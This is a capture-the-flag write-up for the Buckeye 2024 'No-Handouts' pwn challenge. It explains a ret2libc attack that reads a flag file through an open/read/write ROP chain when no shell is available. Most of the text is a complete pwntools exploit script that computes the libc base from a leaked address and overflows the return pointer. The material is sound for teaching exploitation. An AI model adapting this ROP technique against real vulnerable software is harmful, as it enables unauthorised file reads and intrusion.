No-Handouts

Ret2Libc except no shell L

We have a libc function leak via system as seen here, challenge hints to no shell (/bin/sh no worky) so we will have to find alternative ways to get the flag.

We can accomplish this with the open, read, write function calls but first, we will need to find a way to write the string flag.txt onto the libc.

Since we have no stack leak and there is PIE enabled, we can consider writing to libc's .bss section and then referencing the pointer to the written address for my open, read, write functions.

Below is the following exploit flow.

Determine cylic offset to override RIP duh
Determine libc base address from leak
Write the string "flag.txt\x00" to libc's .bss data
Call libc's open, read, write functions with the right parameters to read the flag

#!/usr/bin/env python3

from pwn import *

exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
offset = 40
def conn():
    r = remote('challs.pwnoh.io', 13371)
    #r = process('./chall')
    r.recvuntil(b"believe me? Try it yourself: it's at ")
    system_leak = int(r.recvline().strip(),16)
    r.recvline()
    system_offset = libc.sym['system']
    libc.address = system_leak - system_offset 
    assert libc.address + system_offset == system_leak
    libc_bss_address = libc.bss()
    payload = b'A' * offset
    rop = ROP(libc) # type: ignore
    rop.gets(libc_bss_address)
    rop.open(libc_bss_address, 0)
    rop.read(3, libc_bss_address, 100)
    rop.write(1, libc_bss_address, 100)
    payload += rop.chain()
    r.clean()
    r.sendline(payload)
    r.sendline(b'flag.txt\x00')
    r.interactive()


def main():
    conn()

if __name__ == "__main__":
    main()

PreviousBuckeye 2024 NextTetCTF 2024

Last updated 9 months ago